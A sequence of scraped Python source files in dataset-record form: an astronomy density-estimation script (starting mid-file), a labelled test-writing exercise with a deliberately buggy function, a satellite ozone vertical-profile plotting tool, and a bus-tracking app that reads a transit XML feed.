Default = 10.\n\n\tOutput:\n\t\tdata (pandas dataframe): the data obtained from the query\n\t\"\"\"\n\t#names of the filters\n\tnames = ['Y - J', 'J - H']\n\n\t#open the database\n\tcon = lite.connect(db_name)\n\twith con:\n\n\t\tquery1 = \"\"\"\n\t\t\t\tSELECT Y.Mag1 - J.Mag1, J.Mag1 - H.Mag1\n\t\t\t\tFROM (\n\t\t\t\t\tSELECT f.Mag1, f.StarID, i.FieldID\n\t\t\t\t\tFROM FluxData f \n\t\t\t\t\tJOIN FieldInfo i ON f.ID = i.ID\n\t\t\t\t\tWHERE i.Filter = 'Y' AND f.Flux1/f.dFlux1 > {0}) Y\n\t\t\t\tLEFT JOIN (\n\t\t\t\t\tSELECT f.Mag1, f.StarID, i.FieldID, f.Class\n\t\t\t\t\tFROM FluxData f \n\t\t\t\t\tJOIN FieldInfo i ON f.ID = i.ID\n\t\t\t\t\tWHERE i.Filter = 'J' AND f.Flux1/f.dFlux1 > {0}\n\t\t\t\t) J On Y.StarID = J.StarID AND Y.FieldID = J.FieldID\n\t\t\t\tLEFT JOIN (\n\t\t\t\t\tSELECT f.Mag1, f.StarID, i.FieldID\n\t\t\t\t\tFROM FluxData f \n\t\t\t\t\tJOIN FieldInfo i ON f.ID = i.ID\n\t\t\t\t\tWHERE i.Filter = 'H' AND f.Flux1/f.dFlux1 > {0}\n\t\t\t\t) H On Y.StarID = H.StarID AND Y.FieldID = H.FieldID AND J.Class = -1\n\t\t\t\t\"\"\".format(SN)\n\n\t\t#run the query\n\t\tdata = pd.read_sql(query1, con)\n\n\t\t#rename the columns of the dataframe\n\t\tdata.columns = names\n\t\t#remove all none or nan values\n\t\tdata = data.dropna()\n\n\t\tprint('Number of data points: {0}'.format(len(data[names[0]])))\n\n\t\treturn data\n\ndef make2D_KDE(X, n_samp = 1e5, bandwidth = None, n_folds = 3, bw_train_size = 1000, bw_range_size = 20, doplot = True):\n\t\"\"\"\n\tMake a 2D Kernel Density Estimation and draw a n_samp number of samples from it\n\tbest bandwidth obtained from previous runs\n\tbandwidth = 0.0546938775510204\n\tbandwidth = 0.05894736842105264\n\n\tInput:\n\t\tX (2D numpy array): the training data, consisting of the Y - J and J - H \n\t\tcolours.\\n\n\t\tn_samp (int): the number of samples to draw from the KDE. Default = 100000.\\n\n\t\tbandwidth (float): the bandwidth to use for the KDE from which the samples\n\t\twill be drawn. Set to None to let the script find the best bandwidth. \n\t\tDefault = None.\\n\n\t\tn_folds (int): the number of folds to use when determining the bandwidth.\\n\n\t\tbw_train_size (int): size of the training set that will be used to \n\t\tdetermine the best bandwidth. Default = 1000.\\n\n\t\tbw_range_size (int); the amount of bandwidths to try out in the interval\n\t\t0.04 to 0.1. Default = 20.\\n\n\t\tdoplot (boolean): whether to make a hex-bin plot of the drawn samples or\n\t\tnot. 
Default = True.\n\n\tOutput:\n\t\tsamples (2D numpy array): the samples drawn from the KDE.\n\t\"\"\"\n\timport matplotlib.pyplot as plt\n\timport seaborn as sns\n\tfrom sklearn.neighbors import KernelDensity\n\tfrom sklearn.model_selection import KFold\n\tfrom matplotlib import rcParams\n\trcParams['font.family'] = 'Latin Modern Roman'\n\tfrom matplotlib.colors import LogNorm\n\n\t#shuffle the data\n\tnp.random.shuffle(X)\n\n\t#determine the best bandwidth if it is not provided\n\tif bandwidth == None:\n\t\t#first we find the optimum bandwidth\n\t\tkf = KFold(n_splits = n_folds)\n\n\t\t#range of bandwidths to try\n\t\tbwrange = np.linspace(0.02, 0.08, bw_range_size)\n\t\t#the array which will store the likelyhood\n\t\tlikelyhood = np.zeros(len(bwrange))\n\t\t\n\t\tprint('Finding the best bandwidth...')\n\t\tfor bw, i in zip(bwrange, np.arange(len(bwrange))):\n\t\t\tprint('Iteration {0}, bandwidth {1}'.format(i, bw))\n\t\t\tlh = []\n\t\t\t#split the data into a train and test set using only the first 1000 samples\n\t\t\tfor train_i, test_i in kf.split(X[:,:bw_train_size]):\n\t\t\t\tXtrain, Xtest = X[train_i], X[test_i]\n\t\t\t\tkde = KernelDensity(bandwidth = bw, kernel = 'gaussian').fit(Xtrain)\n\n\t\t\t\tlhscore = kde.score(Xtest)\n\t\t\t\t\n\t\t\t\tlh = np.append(lh, lhscore)\n\n\t\t\t\tprint('Bandwidth: {0}, score: {1}'.format(bw, lhscore))\n\t\t\t\t\n\t\t\tlikelyhood[i] = np.mean(lh)\n\n\t\tplt.plot(bwrange, likelyhood)\n\t\tplt.xlabel('Bandwidth')\n\t\tplt.ylabel('Likelyhood')\n\t\tplt.title('KDE likelyhood for different bandwidths')\n\t\tplt.savefig('2D_KDE_likelyhood_run4.png', dpi = 300)\n\t\tplt.close()\n\n\n\t\t#find the bandwidth which gave the highest likelyhood\n\t\tbandwidth = bwrange[np.argmax(likelyhood)]\n\n\t\tprint('Best bandwidth: {0}'.format(bandwidth))\n\n\tkde = KernelDensity(bandwidth = bandwidth, kernel = 'gaussian').fit(X)\n\n\t#pull samples from the kde\n\tsamples = kde.sample(int(n_samp))\n\t\n\t#plot the samples in a hexbin plot\n\tif doplot:\n\t\tplt.hexbin(samples[:, 0], samples[:, 1], bins = 'log', cmap = 'Reds')\n\t\tplt.colorbar(label = 'Density of samples [logarithmic]')\n\n\t\tplt.xlabel('Y - J')\n\t\tplt.ylabel('J - H')\n\t\tplt.title('Distribution of samples in (Y-J, J-H) colour space')\n\t\tplt.savefig('Samples_distribution_hex.pdf', dpi = 300)\n\t\tplt.show()\n\n\treturn samples\n\t\n\ncreateDB()\nfillDataBase()\nR1()\n\n\n#load the data as a pandas dataframe\n# df = loadYJHdata()\n\n#input the data as a numpy array and receive the 100000 samples\n# samples = make2D_KDE(np.array([df['Y - J'], df['J - H']]).T, bandwidth = 0.0389474)\n","sub_path":"FinalProject/Q1/finalproject_Q1.py","file_name":"finalproject_Q1.py","file_ext":"py","file_size_in_byte":15406,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"75218658","text":"\"\"\"This function has two bugs.\nYour mission is to write a test\nsuite that uncovers both.\n\"\"\"\nfrom typing import Tuple\n\ndef max_run(l: list) -> list:\n \"\"\"Returns the longest 'run' in the list.\n Example: max_run([ 1, 1, 2, 2, 2, 3, 3 ]\n returns [2, 2, 2]\n \"\"\"\n cur_item = l[0]\n longest = []\n cur_run = []\n for item in l:\n if item == cur_item:\n cur_run.append(item)\n else:\n if len(cur_run) > len(longest):\n longest = cur_run\n cur_run = [ item ]\n cur_item = item\n return 
longest\n\n\n\n\n","sub_path":"buggy.py","file_name":"buggy.py","file_ext":"py","file_size_in_byte":580,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"127208223","text":"#!/usr/bin/env python\nfrom __future__ import print_function\nimport sys\nimport numpy as np\nfrom warnings import warn\nfrom netCDF4 import MFDataset, Dataset\nfrom collections import defaultdict\nfrom datetime import datetime, timedelta\nfrom glob import glob\nunitconvert = {('ppmV', 'ppb'): lambda x: x * 1000.}\n\ndef maskfilled(v):\n return np.ma.masked_values(v[:], v.attrs['_FillValue'])\n\ndef plot_omi(ax, lon_bnds, lat_bnds, omipaths, key = 'O3Profile', airden = None, airdenvert = None):\n import h5py\n from scipy.constants import Avogadro\n allx = []\n ally = []\n lon_bnds = lon_bnds[:]\n lat_bnds = lat_bnds[:]\n if len(omipaths) == 0:\n return None, None\n \n omipaths = reduce(list.__add__, [glob(i) for i in omipaths])\n omipaths.sort()\n for path in omipaths:\n print(path)\n f = h5py.File(path, mode = 'r')\n swaths = f['HDFEOS']['SWATHS'][key]\n latsv = swaths['Geolocation Fields']['Latitude']\n lonsv = swaths['Geolocation Fields']['Longitude']\n lats = maskfilled(latsv).reshape(-1, 1)\n lons = maskfilled(lonsv).reshape(-1, 1)\n inboth = matchspace(lons, lats, lon_bnds, lat_bnds)\n if inboth.filled(False).sum(0) > 0: \n print('******** FOUND ******', path)\n pressurev = swaths['Geolocation Fields']['Pressure']\n altitudev = swaths['Geolocation Fields']['Altitude']\n nk = pressurev.shape[-1]\n speciesv = swaths['Data Fields']['O3']\n species = maskfilled(speciesv).reshape(-1, nk -1)\n\n # Pressure is from top to bottom\n pressure = maskfilled(pressurev).reshape(-1, nk)\n altitude = maskfilled(altitudev).reshape(-1, nk)\n dz = -(altitude[:, 1:] - altitude[:, :-1]) * 1000. * 100.\n #Lacis 1990 1 DU = 2.69e16 molecules cm-2\n species = species * .001 / dz # cm /cm # vrm\n x = pressure[inboth]\n y = species[inboth]\n allx.append(x)\n ally.append(y)\n else:\n warn('No data found for %s: lons (%s, %s) and lats (%s, %s); lonbs (%s, %s) and latbs (%s, %s);' % (path, lons.min(), lons.max(), lats.min(), lats.max(), lon_bnds.min(), lon_bnds.max(), lat_bnds.min(), lat_bnds.max()))\n \n if len(allx) == 0:\n print('*' * 80 + '\\n\\nNo OMI DATA FOUND AT ALL\\n\\n' + '*'*80)\n return None, None\n \n var = np.ma.masked_values(np.ma.concatenate(ally, axis = 0), -999.) 
* 1e9\n var = var.reshape(-1, var.shape[-1])\n vertcrd = np.ma.masked_values(np.ma.concatenate(allx, axis = 0), -999.).mean(0) #.reshape(-1, 2).mean(1)\n omil, omir = minmaxmean(ax, var.T.repeat(2, 0), vertcrd.repeat(2, 0)[1:-1], ls = '-', lw = 2, color = 'b', facecolor = 'b', edgecolor = 'b', alpha = .2, zorder = 5, label = 'OMI')\n ax.text(.05, .7, 'OMI = %d' % var.shape[0], transform = ax.transAxes)\n return omil, omir\n\n\ndef matchspace(lons, lats, lon_bnds, lat_bnds):\n inlon = np.logical_and(lons >= lon_bnds[None, :, 0], lons <= lon_bnds[None, :, 1])\n inlat = np.logical_and(lats >= lat_bnds[None, :, 0], lats <= lat_bnds[None, :, 1])\n inboth = np.logical_and(inlon, inlat).any(1)\n return inboth\n\ndef plot_tes(ax, lon_bnds, lat_bnds, tespaths):\n from netCDF4 import Dataset\n allx = []\n ally = []\n lon_bnds = lon_bnds[:]\n lat_bnds = lat_bnds[:]\n if len(tespaths) == 0:\n return None, None\n tespaths = reduce(list.__add__, [glob(i) for i in tespaths])\n tespaths.sort()\n for path in tespaths:\n f = Dataset(path)\n lats = f.variables['latitude'][:][:, None]\n lons = f.variables['longitude'][:][:, None]\n pressure = f.variables['pressure']\n species = f.variables['species']\n inboth = matchspace(lons, lats, lon_bnds, lat_bnds)\n if inboth.sum(0) > 0: \n print('******** FOUND ******', path)\n x = pressure[inboth]\n y = species[inboth]\n allx.append(x)\n ally.append(y)\n else:\n warn('No data found for %s' % path)\n \n if len(allx) == 0:\n return None, None\n var = np.ma.masked_values(np.ma.concatenate(ally, axis = 0), -999.) * 1e9\n var = var.reshape(-1, var.shape[-1])\n vertcrd = np.ma.masked_values(np.ma.concatenate(allx, axis = 0), -999.).mean(0)\n tesl, tesr = minmaxmean(ax, var.T, vertcrd, ls = '-', lw = 2, color = 'r', facecolor = 'r', edgecolor = 'r', alpha = .2, zorder = 2, label = 'TES')\n ax.text(.05, .8, 'TES = %d' % var.shape[0], transform = ax.transAxes)\n return tesl, tesr\n\ndef minmaxmean(ax, vals, vertcrd, **kwds):\n minval = vals.min(1)\n meanval = vals.mean(1)\n maxval = vals.max(1)\n linekwds = kwds.copy()\n linekwds['color'] = linekwds.pop('facecolor')\n linekwds.pop('edgecolor')\n linekwds.pop('alpha')\n fillkwds = kwds.copy()\n fillkwds['ls'] = 'solid'\n \n line, = ax.plot(meanval, vertcrd, **linekwds)\n\n x = np.ma.concatenate([minval[:vertcrd.size], maxval[:vertcrd.size][::-1]])\n y = np.ma.concatenate([vertcrd[:], vertcrd[::-1]])\n mask = x.mask | y.mask\n x = np.ma.masked_where(mask, x).compressed()\n y = np.ma.masked_where(mask, y).compressed()\n range, = ax.fill(x, y, **fillkwds)\n return line, range\n\ndef plot(ifiles, args):\n from PseudoNetCDF.coordutil import getsigmamid, getpresmid, gettimes\n import pylab as pl\n from pylab import figure, NullFormatter, close, rcParams\n rcParams['text.usetex'] = False\n from matplotlib.colors import LinearSegmentedColormap, BoundaryNorm, LogNorm\n scale = args.scale;\n minmax = eval(args.minmax)\n minmaxq = eval(args.minmaxq)\n sigma = args.sigma\n maskzeros = args.maskzeros\n outunit = args.outunit\n tespaths = args.tespaths\n omipaths = args.omipaths\n edges = args.edges\n try:\n f, = ifiles\n except:\n raise ValueError('curtain plot expects one file when done. 
Try stack time --stack=time to concatenate')\n\n # Add CF conventions if necessary\n if 'latitude_bounds' not in f.variables.keys():\n try:\n from PseudoNetCDF import getvarpnc\n from PseudoNetCDF.conventions.ioapi import add_cf_from_ioapi\n f = getvarpnc(f, None)\n add_cf_from_ioapi(f)\n except:\n pass\n if sigma:\n vertcrd = getsigmamid(f)\n else:\n vertcrd = getpresmid(f, pref = 101325., ptop = getattr(f, 'VGTOP', 10000))\n if vertcrd.max() > 2000: vertcrd /= 100.\n\n try:\n lonb = f.variables['geos_longitude_bounds']\n latb = f.variables['geos_latitude_bounds']\n except:\n lonb = f.variables['longitude_bounds']\n latb = f.variables['latitude_bounds']\n for var_name in args.variables:\n temp = defaultdict(lambda: 1)\n try:\n eval(var_name, None, temp)\n var = eval(var_name, None, f.variables)[:]\n except:\n temp[var_name]\n var = f.variables[var_name][:]\n if maskzeros: var = np.ma.masked_values(var, 0)\n unit = f.variables[temp.keys()[0]].units.strip()\n if unit in unitconvert:\n var = unitconvert.get((unit, outunit), lambda x: x)(var)\n else:\n outunit = unit\n bmap = None\n vmin, vmax = np.percentile(np.ma.compressed(var).ravel(), list(minmaxq))\n if minmax[0] is not None:\n vmin = minmax[0]\n if minmax[1] is not None:\n vmax = minmax[1]\n if edges:\n fig = pl.figure(figsize = (16, 4))\n offset = 0.05\n ax = fig.add_axes([.1 - offset, .15, .22, .725])\n ax = fig.add_axes([.325 - offset, .15, .22, .725])\n ax = fig.add_axes([.55 - offset, .15, .22, .725])\n ax = fig.add_axes([.775 - offset, .15, .22, .725])\n ss = 0\n se = ss + f.NCOLS + 1\n es = se\n ee = se + f.NROWS + 1\n ns = ee\n ne = ee + f.NCOLS + 1\n ws = ne\n we = ws + f.NROWS + 1\n axs = fig.axes\n for ax in fig.axes[1:]:\n ax.yaxis.set_major_formatter(pl.NullFormatter())\n \n vars = [var[:, :, ss:se], var[:, :, es:ee], var[:, :, ns:ne][:, :, ::-1], var[:, :, ws:we][:, :, ::-1]]\n lonbss = [lonb[ss:se], lonb[es:ee], lonb[ns:ne][::-1], lonb[ws:we][::-1]]\n latbss = [latb[ss:se], latb[es:ee], latb[ns:ne][::-1], latb[ws:we][::-1]]\n \n else:\n fig = pl.figure(figsize = (8, 4))\n ax = fig.add_axes([.1, .15, .8, .725])\n axs = fig.axes\n vars = [var]\n lonbss = [lonb[:]]\n latbss = [latb[:]]\n for ax, var, lonbs, latbs in zip(axs, vars, lonbss, latbss):\n vals = var.swapaxes(0, 1).reshape(var.shape[1], -1)\n ax.text(.05, .9, 'n = %d' % vals.shape[1], transform = ax.transAxes)\n modl, modr = minmaxmean(ax, vals, vertcrd, facecolor = 'k', edgecolor = 'k', alpha = .2, zorder = 4, label = 'GC', ls = '-', lw = 2, color = 'k')\n llines = [(modl, modr)]\n ymin, ymax = vertcrd.min(), vertcrd.max()\n ax.set_ylim(ymax, ymin)\n ax.set_xscale(scale)\n ax.set_xlim(vmin, vmax)\n #if scale == 'log':\n # ax.set_xticklabels(['%.1f' % (10**x) for x in ax.get_xticks()])\n \n if 'TFLAG' in f.variables.keys():\n SDATE = f.variables['TFLAG'][:][0, 0, 0]\n EDATE = f.variables['TFLAG'][:][-1, 0, 0]\n STIME = f.variables['TFLAG'][:][0, 0, 1]\n ETIME = f.variables['TFLAG'][:][-1, 0, 1]\n if SDATE == 0:\n SDATE = 1900001\n EDATE = 1900001\n sdate = datetime.strptime('%07d %06d' % (SDATE, STIME), '%Y%j %H%M%S')\n edate = datetime.strptime('%07d %06d' % (EDATE, ETIME), '%Y%j %H%M%S')\n elif 'tau0' in f.variables.keys():\n sdate = datetime(1985, 1, 1, 0) + timedelta(hours = f.variables['tau0'][0])\n edate = datetime(1985, 1, 1, 0) + timedelta(hours = f.variables['tau1'][-1])\n else:\n times = gettimes(f)\n sdate = times[0]\n edate = times[-1]\n\n if len(tespaths) > 0:\n tesl, tesr = plot_tes(ax, lonbs, latbs, tespaths)\n if not tesl is None:\n 
llines.append((tesl, tesr))\n if len(omipaths) > 0:\n omil, omir = plot_omi(ax, lonbs, latbs, omipaths, airden = f.variables['AIRDEN'][:].mean(0).mean(1), airdenvert = vertcrd)\n if not omil is None:\n llines.append((omil, omir))\n\n try:\n title = '%s to %s' % (sdate.strftime('%Y-%m-%d'), edate.strftime('%Y-%m-%d'))\n except:\n title = var_name\n if sigma:\n axs[0].set_ylabel('sigma')\n else:\n axs[0].set_ylabel('pressure')\n \n xmax = -np.inf\n xmin = np.inf\n for ax in fig.axes:\n tmp_xmin, tmp_xmax = ax.get_xlim()\n xmax = max(tmp_xmax, xmax)\n xmin = min(tmp_xmin, xmin)\n for ax in fig.axes:\n ax.set_xlim(xmin, xmax)\n \n if len(axs) == 1:\n axs[0].set_xlabel('%s %s' % (var_name, outunit))\n else:\n axs[0].set_xlabel('South')\n axs[1].set_xlabel('East')\n axs[2].set_xlabel('North')\n axs[3].set_xlabel('West')\n fig.text(.5, .90, '%s %s' % (var_name, outunit), horizontalalignment = 'center', fontsize = 16)\n nl = 0\n for ax in axs:\n if len(ax.get_lines()) > nl:\n nl = len(ax.get_lines())\n pl.sca(ax)\n \n llabels = [l[0].get_label() for l in llines]\n pl.legend(llines, llabels, bbox_to_anchor = (.1, 1), loc = 'upper left', bbox_transform = fig.transFigure, ncol = 6)\n if edges:\n fig.text(0.95, 0.975, title, horizontalalignment = 'right', verticalalignment = \"top\", fontsize = 16)\n else:\n fig.text(0.95, 0.025, title, horizontalalignment = 'right', verticalalignment = \"bottom\", fontsize = 16)\n fig.savefig('%s_%s.%s' % (args.outpath, var_name, args.figformat))\n pl.close(fig)\n return fig\n\nif __name__ == '__main__':\n from PseudoNetCDF.pncparse import getparser, pncparse\n \n parser = getparser(has_ofile = True, plot_options = True, interactive = False)\n\n parser.add_argument(\"--sigma\", dest = \"sigma\", action = \"store_true\", default = False,\n help = \"Plot on sigma coordinate instead of pressure\")\n\n parser.add_argument(\"--scale\", dest = \"scale\", type = str, default = 'log',\n help = \"Defaults to log, but linear and semilog are also options.\")\n\n parser.add_argument(\"--minmax\", dest = \"minmax\", type = str, default = \"None,None\",\n help = \"Use values to set range (xmin, xmax); defaults None,None.\")\n\n parser.add_argument(\"--mask-zeros\", dest = \"maskzeros\", action = \"store_true\", default = False,\n help = \"Defaults False.\")\n\n parser.add_argument(\"--minmaxq\", dest = \"minmaxq\", type = str, default = '0,100',\n help = \"Use quartiles to set range (xmin, xmax); defaults 0,100.\")\n\n parser.add_argument(\"--out-unit\", dest = \"outunit\", type = str, default = 'ppb',\n help = \"Defaults ppb.\")\n\n parser.add_argument(\"--tes-paths\", dest = \"tespaths\", type = str, default = [], action = \"append\",\n help = \"Plot tes on top of boundary from paths; defaults to []\")\n\n parser.add_argument(\"--omi-paths\", dest = \"omipaths\", type = str, default = [], action = \"append\",\n help = \"Plot omi on top of boundary from paths; defaults to []\")\n\n parser.add_argument(\"--itertime\", dest = \"itertime\", default = False, action = 'store_true',\n help = \"Iterate over times and plot each one.\")\n \n parser.add_argument(\"--edges\", dest = \"edges\", default = False, action = \"store_true\",\n help = \"Plot S,E,N,W edges instead of a single plot.\")\n parser.epilog = \"\"\"\nExample:\n $ pncvertprofile.py outputs/ts20120301.bpch.BCON.nc test_profile -v O3 --edges --minmaxq .5,99.5 --tes-paths=~/Data/test/*\n\"\"\"\n \n ifiles, args = pncparse(has_ofile = True, parser = parser)\n if args.variables is None:\n raise ValueError('User must specify 
variable(s) to plot:\\n%s' % '\\n\\t'.join(ifiles[0].variables.keys()))\n if len(args.tespaths) > 0:\n args.tespaths = reduce(list.__add__, [tp.split(',') for tp in args.tespaths])\n \n if len(args.omipaths) > 0:\n args.omipaths = reduce(list.__add__, [op.split(',') for op in args.omipaths])\n plot(ifiles, args)\n","sub_path":"scripts/pncvertprofile.py","file_name":"pncvertprofile.py","file_ext":"py","file_size_in_byte":14890,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"642334244","text":"#!/usr/bin/python3\nfrom datetime import datetime\nimport math\nimport os\nimport xml.etree.ElementTree as ET\n\nfrom cvtdBusLocator import CvtdBusLocator\nfrom cvtdBusPosition import CvtdBusPosition\nfrom cvtdContainedRoadPoint import ContainedRoadPoint\nfrom cvtdMap import CvtdMap\nfrom cvtdNode import CvtdNode\nfrom cvtdRoad import CvtdRoad\nfrom cvtdRoadPoint import CvtdRoadPoint\nfrom cvtdRoute import CvtdRoute\nfrom cvtdRouteSegment import CvtdRouteSegment\nfrom cvtdUtil import CvtdUtil\nimport direction\nfrom direction import Direction\n\n####\n# print_print_list prints the print list which has been sorted\n#\n# print_list see description of print_list in add_to_print_list\n# count is the number of past positions we want to print\n####\ndef print_print_list(print_list, count):\n\tfor info in print_list:\n\t\tfmt = \"{: <\" + str(2+max([len(print_list[key][0]) for key in print_list.keys()])) + \"}\"\n\t\tfmt = fmt.format(print_list[info][0])\n\t\tfor i in range(count):\n\t\t\ttry:\n\t\t\t\tfmt = fmt + \"{}: {: <\" + str(2+max([len(print_list[key][i+1][1]) for key in print_list])) + \"}{: <10}{: <3}| \"\n\t\t\t\t#print(max([print_list[key][i][0] for key in print_list]))\n\t\t\t\tfmt = fmt.format(print_list[info][i+1][0].strftime(\"%H:%M:%S\"),\n\t\t\t\t\tprint_list[info][i+1][1],\n\t\t\t\t\tstr(print_list[info][i+1][2]) + \" feet\",\n\t\t\t\t\tprint_list[info][i+1][3].short_str())\n\t\t\texcept IndexError:\n\t\t\t\tpass\n\t\tprint(fmt)\n\n####\n# add_to_print_list adds an entry to the print list for formatting and printing later\n# We use a print list so that we can compute the address of each bus, and use\n# the shortest amount of whitespace that will work with all of the buses\n# print_list is a dictionary, where bus number is a key\n# print_list[key][0] is the route name\n# print_list[key][1+j][0] is timestamp\n# print_list[key][1+j][1] is address\n# print_list[key][1+j][2] is error\n# print_list[key][1+j][3] is direction as a Direction class\n#\n# myMap is the CvtdMap, used to get list of valid streets for route \n# locator is the CvtdBusLocator\n# print_list is the print list we are adding to\n# rid is the bus route id (key into locator) that we are adding to print list\n# ix is the index into the locator's list of positions, most likely negative\n####\ndef add_to_print_list(myMap, locator, print_list, rid, ix):\n\ttry:\n\t\tposition = locator.pos[rid][ix]\n\t\tt = position.timestamp\n\t\tlat = position.lat\n\t\tlon = position.lon\n\t\tdir = position.direction\n\texcept IndexError:\n\t\treturn\n\n\t# Determine route\n\ttry:\n\t\troute = myMap.routeDict[rid]\n\t\trouteName = route.routeShortName\n\t\t# validStreets = route.get_street_list()\n\texcept KeyError:\n\t\trouteName = \"Unknown Route\"\n\t\t# validStreets = None\n\tvalidStreets = None\n\n\t# Compute address\n\t# roadIx, addr, error = myMap.compute_addr_repr(lat, lon, validStreets)\n\troadIx, addr, error = myMap.compute_addr_repr(lat, lon, None)\n\tif validStreets is not None and 
error > 250:\n\t\troadIx, addr_off_route, error_off_route = myMap.compute_addr_repr(lat, lon, None)\n\t\tif error_off_route < 200:\n\t\t\taddr = \"!\" + addr_off_route \n\t\t\terror = error_off_route\n\terror = round(error)\n\n\t# Determine if direction is actual or if it should be X\n\ttry:\n\t\tlat_to_lat_diff = CvtdUtil.coord_to_ft(abs(locator.pos[rid][ix - 1].lat - lat))\n\t\tlon_to_lon_diff = CvtdUtil.coord_to_ft(abs(locator.pos[rid][ix - 1].lon - lon))\n\t\tpos_to_pos_diff = math.sqrt(lat_to_lat_diff ** 2 + lon_to_lon_diff ** 2)\n\t\tif (pos_to_pos_diff < 40):\n\t\t\tdir = Direction.X\n\t\telse:\n\t\t\tdir = direction.get_direction(dir)\n\texcept IndexError:\n\t\tdir = direction.get_direction(dir)\n\n\t# Add to list to print later\n\ttry:\n\t\tprint_list[rid].append([t, addr, error, dir])\n\texcept KeyError:\n\t\tprint_list[rid] = [routeName]\n\t\tprint_list[rid].append([t, addr, error, dir])\n\n####\n# pull_data pulls the XML feed and adds new positions to the Bus Locator, also returns new positions\n#\n# key is the text to insert into the URL\n# locator is the Bus Locator where new positions will be added\n#\n# return is a set of bus route ids (keys into locator) with new data\n####\ndef pull_data(key, locator):\n\tNUM_ELEMENTS = 5\n\tnewElements = set()\n\n\tos.system(\"curl -o cvtddata.txt http://cvtd.info:8080/CVTDfeed/V200/XML/_System.php?key={} -s\".format(key))\n\ttree = ET.parse('cvtddata.txt')\n\troot = tree.getroot()\n\tfor bus in root:\n\t\tfor i in range(NUM_ELEMENTS - 1, 0, -1):\n\t\t\ttry:\n\t\t\t\trid = bus[2].text\n\t\t\t\tbnum = bus[3].text\n\t\t\t\trnum = bus[4].text\n\t\t\t\troute = bus[5].text\n\t\t\t\tt = datetime.strptime(bus[8][i].text.strip(), \"%Y-%m-%d %H:%M:%S.%f\")\n\t\t\t\tlat = float(bus[8][i][0].text)\n\t\t\t\tlon = float(bus[8][i][1].text)\n\t\t\t\tdirection = int(bus[8][i][2].text)\n\t\t\t\tif lat == 0.0 and lon == 0.0:\n\t\t\t\t\tcontinue\n\n\t\t\t\tentry = locator.find(rid, t)\n\t\t\t\tif entry is None:\n\t\t\t\t\tnewPos = CvtdBusPosition(t, lat, lon, direction)\n\t\t\t\t\tnewElements.add(rid)\n\t\t\t\t\tlocator.insert_append(rid, newPos)\n\t\t\texcept (IndexError, ValueError):\n\t\t\t\tcontinue\n\treturn newElements\n\n####\n# pull pulls data from the XML feed, updates the locator, and prints new positions to the screen\n#\n# myMap is the CvtdMap\n# locator is the CvtdBusLocator\n# count is the number of positions to print for each bus, 1-5\n# key is the text to insert into the URL\n####\ndef pull(myMap, locator, count, key):\n\tif not 1 <= count <= 5:\n\t\tprint(\"Error [pull]: Count must be between 1 and 5\")\n\t\treturn\n\n\tnewElements = pull_data(key, locator)\n\n\t# Generate print list so that formatting can be aligned\n\tprint_list = {}\n\tfor i in range(count):\n\t\tfor element in newElements:\n\t\t\tadd_to_print_list(myMap, locator, print_list, element, -1 - i)\n\n\t# Print everything in the print list\n\tprint_print_list(print_list, count)\n\n####\n# list_locator prints all positions stored in locator to the screen\n#\n# myMap is the CvtdMap\n# locator is the CvtdBusLocator\n# command is the command used, to be parsed for a route number. 
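# add_to_print_list above reports the direction as 'X' when two consecutive
# fixes are less than 40 feet apart. A standalone sketch of that
# displacement test; FT_PER_DEG is a rough assumption standing in for
# CvtdUtil.coord_to_ft, and math.hypot replaces the explicit sqrt of squares.
import math

FT_PER_DEG = 364000.0  # approximate feet per degree of latitude; illustrative

def moved_enough(p1, p2, threshold_ft=40.0):
    dlat_ft = abs(p2[0] - p1[0]) * FT_PER_DEG
    dlon_ft = abs(p2[1] - p1[1]) * FT_PER_DEG
    return math.hypot(dlat_ft, dlon_ft) >= threshold_ft

print(moved_enough((41.7450, -111.8097), (41.7452, -111.8097)))  # True, ~73 ft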
Else route number will be queried\n####\ndef list_locator(myMap, locator, command):\n\twords = command.split()\n\tif len(words) == 1:\n\t\tword = input(\"Enter route number to display: \")\n\t\twords.append(word)\n\tif len(words) >= 2:\n\t\tprint_list = {}\n\t\tfor word in words[1:]:\n\t\t\ttry:\n\t\t\t\tfor ix in range(len(locator.pos[word])):\n\t\t\t\t\troute = myMap.find_route_by_rnum(word)\n\t\t\t\t\tadd_to_print_list(myMap, locator, print_list, route.buses[0].id, ix)\n\t\t\texcept KeyError:\n\t\t\t\tprint(f\"Error: Unknown route: {word}\")\n\t\tprint_print_list(print_list, 1)\n \n####\n# get_filename parses a read or write command, and returns filename if given, else roads.txt\n#\n# command (should start with (r)ead or (w)rite), then filename if desired\n#\n# return[0] is the requested or default filename\n####\ndef get_filename(command):\n    words = [a.strip() for a in command.strip().split()]\n    if len(words) <= 1:\n        return \"roads.txt\"\n    else:\n        return words[1]\n\n####\n# show_help prints a help message to the screen\n####\ndef show_help():\n\tprint(\"(1) Pull XML feed\")\n\tprint(\"(2) List locator positions\")\n\tprint(\"(3) Import Google directory\")\n\tprint(\"(r) Read roads file\")\n\tprint(\"(q) Quit\")\n\n####\n# main is the application entry point\n####\ndef main():\n\twith open('key.txt', 'r') as f:\n\t\tkey = f.read()\n\n\tmyMap = CvtdMap()\n\tlocator = CvtdBusLocator('locator/')\n\tlocator.read_locator()\n\tcommand = \"help\"\n\twhile command not in [\"quit\", \"exit\", \"q\", \"e\"]:\n\t\tif command == \"\":\n\t\t\tpass\n\t\telif command == \"1\":\n\t\t\tpull(myMap, locator, 1, key)\n\t\telif command[0] == \"2\":\n\t\t\tlist_locator(myMap, locator, command)\n\t\telif command == \"3\":\n\t\t\tmyMap.import_google_directory()\n\t\telif command.lower().strip().split()[0] in ['r', 'read', 'o', 'open']:\n\t\t\tmyMap.read_roads(get_filename(command))\n\t\telse:\n\t\t\tshow_help()\n\t\tcommand = input(\"\\n>>> \")\n\t\nif __name__ == '__main__':\n\tmain()\n\n","sub_path":"cvtdapp.py","file_name":"cvtdapp.py","file_ext":"py","file_size_in_byte":7594,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"}
